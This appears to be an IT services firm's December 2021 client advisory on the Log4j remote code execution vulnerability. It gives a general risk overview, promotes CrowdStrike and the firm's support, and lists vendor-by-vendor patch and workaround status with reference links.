You may have seen recent news concerning the latest cyber threat, “Log4j”. Log4j is an open-source logging utility used in countless apps by organizations of all sizes. The flaw in Log4j allows attackers to easily gain remote access, as this vulnerability is a Remote Code Execution (RCE) vulnerability, over computers running applications in Java, a popular programming language.
At this time many applications do not have a patch released, but many do have a workaround that can be put in place.
If you are one of Conversant’s fully managed clients, you have already heard from us on this situation, as we are currently applying the patches and workarounds across your organization’s environment. You do not need to read further unless you are a managed client that has not yet adopted deep packet inspection with all advanced services enabled, SOC-as-a-Service, and an advanced EDR platform, such as Crowdstrike. Every organization is in a different position with their associated security evolution. There are actions required of you to properly mitigate and remediate this situation.
The publicly available news suggests over 840,000 companies have been identified by the threat actors as being vulnerable. Threat actors are actively exploiting this vulnerability, and it can be leveraged to gain remote access to your environments, execute code, and encrypt and/or steal your data. If your organization does not have active security tool and log monitoring, you likely will not notice threat actor activity until the threat actor drops a payload that causes your systems to stop functioning as normal.
Another vulnerability, or shortcoming, of the original fix has been discovered, and a third vulnerability is also believed to exist. Expect a chain of discovered vulnerabilities and associated fixes. Information is developing quickly on this situation. We care about you—please move briskly to mitigate this risk.
First, the good news. If you are using CrowdStrike, CrowdStrike will protect devices running their endpoint software. Partners running CrowdStrike can review a dedicated Log4j dashboard in the CrowdStrike portal. This portal will show any attempted exploits that have been attempted. This dashboard is accessed by going to Investigate -> Vulnerabilities -> Log4Shell Vulnerability Dashboard within the Crowdstrike portal. If you are not running Crowdstrike, you should strongly consider adopting it as a complement to your other endpoint controls. Conversant has a strong partnership with Crowdstrike, and we can make this adoption painless: this Log4j is not the first high profile vulnerability, and it will not be the last. Additionally, Crowdstrike as a service called Spotlight that provides even more insight into vulnerable systems; this service is often purchased separately.
Additionally, Fortinet, and likely other firewall vendors, have mitigations for the Log4j risks. The links for the Fortinet mitigations are noted below. Your SOC-as-aService vendor, such as eSentire, Arctic Wolf, AlertLogic, and others, may have specific recommendations for Log4J; you should consider reading your provider’s documentation.
You need to identify where Log4j is being used and follow individual vendor instructions to patch or work-around. To help, we have compiled the list below containing common products you may use, and we have included status of where these products/companies currently stand related to Log4j. Due to the fluidity of the issue, we have included links to allow you to get their latest status.
If you would like for us to assist with implementing any patches or workarounds, please email our support team at support@conversantgroup.com, and we will schedule resources to reach out and assist. Please note, we, and everyone else in the country, is overwhelmed right now, so please be patient as we are moving as fast as we can given the incredible volume of requests.
- Arctic Wolf – https://arcticwolf.com/resources/blog/log4j
- Not Impacted; however, a detection tool has been developed.
- Citrix – Citrix Security Advisory for Apache CVE-2021-44228
- The following products are NOT impacted by the vulnerability at this time.
- ADC
- Cloud Connectors
- License Server
- SD-WAN
- ShareFile Storage Zone Controllers
- Virtual Apps and Desktops
- Workspace App
- Cisco – Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021
- Some products that have been confirmed to be affected are the following. At this time there is no workaround, and a patch is being created.
- Firepower Threat Defense/Firepower Device Manager
- Identity Services Engine
- Unified Communications Manager
- ASA Software (under investigation)
- Prime Infrastructure (under investigation)
- Aironet Access Points (under investigation)
- Some products that have been confirmed to be affected are the following. At this time there is no workaround, and a patch is being created.
- Cohesity
- Impacted by the vulnerability; there is no workaround at this time. A patch is currently being created.
- CrowdStrike
- Released recommended settings to prevent Log4j.
- We have verified that all our managed partners running CrowdStrike have the recommended settings applied/enabled in the portal.
- Dell WYSE Management Suite – DSA-2021-267: Dell Wyse Management Suite Security Update for Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) | Dell Canada
- Impacted by the vulnerability.
- Version 3.5.1 protects against the vulnerability.
- eSentire – https://www.esentire.com/security-advisories/critical-apache-zero-day-vulnerability
- Not impacted; however, eSentire is actively monitoring.
- Fortinet – Log4j2 Vulnerability | FortiGuard
- The following products are NOT impacted by the vulnerability:
- FortiAnalyzer
- FortiClient / EMS
- FortiGate
- FortiManager
- The following products will help with protection against the Log4j vulnerability.
- FortiAnalyzer
- Outbreak Detection
- Version 1.00038
- Detects indicators for Log4j vulnerability from across the security fabric.
- Threat Hunting
- Version 6.4+
- Detects indicators for Log4j vulnerability from across the security fabric.
- Outbreak Detection
- FortiClient / EMS
- Application Firewall
- Version 19.218
- Blocks attach attempt to exploit a Remote Code Execution Vulnerability in Apache Log4j.
- Threat Hunting
- Version 6.2+
- Verify endpoint protections and monitor for any alerts related to Log4j2 exploit attempts.
- Application Firewall
- FortiGate
- IPS
- Version 19.218
- Blocks exploitation of the Log4j vulnerability.
- IPS
- FortiAnalyzer
- The following products are NOT impacted by the vulnerability:
- HPE Nimble
- Not impacted by Log4j2 at this time.
- HPE SimpliVity and 3PAR – Document – HPESBGN04215 rev.2 – Certain HPE Products using Apache Log4j2, Remote Code Execution | HPE Support
- Certain versions of SimpliVity and 3PAR are impacted by Log4j.
- iGel – ISN 2021-11: UMS Log4j vulnerability (igel.com)
- Universal Management Suit (UMS) is impacted.
- Currently no patch released.
- There is a temporary workaround.
- Palo Alto – CVE-2021-44228 Informational: Impact of Log4j Vulnerability CVE-2021-44228 (paloaltonetworks.com)
- No products impacted by Log4j2 at this time.
- Unitrends
- Not impacted by Log4j2 at this time.
- VMware – https://kb.vmware.com/s/article/87068
- Horizon View – Impacted.
- Currently no patch released. The following article addresses a temporary workaround.
- vRealize – Impacted.
- Currently no patch released. The following article addresses a temporary workaround.
- Site Recovery – Impacted
- Currently no patch released. The following article addresses a temporary workaround.
- vCenter Appliance – Impacted
- Currently no patch released. The following article addresses a temporary workaround.
- Horizon View – Impacted.
Other Relevant Links:
- https://github.com/cisagov/log4j-affected-db
- https://github.com/NCSC-NL/log4shell/tree/main/software
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://logging.apache.org/log4j/2.x/security.html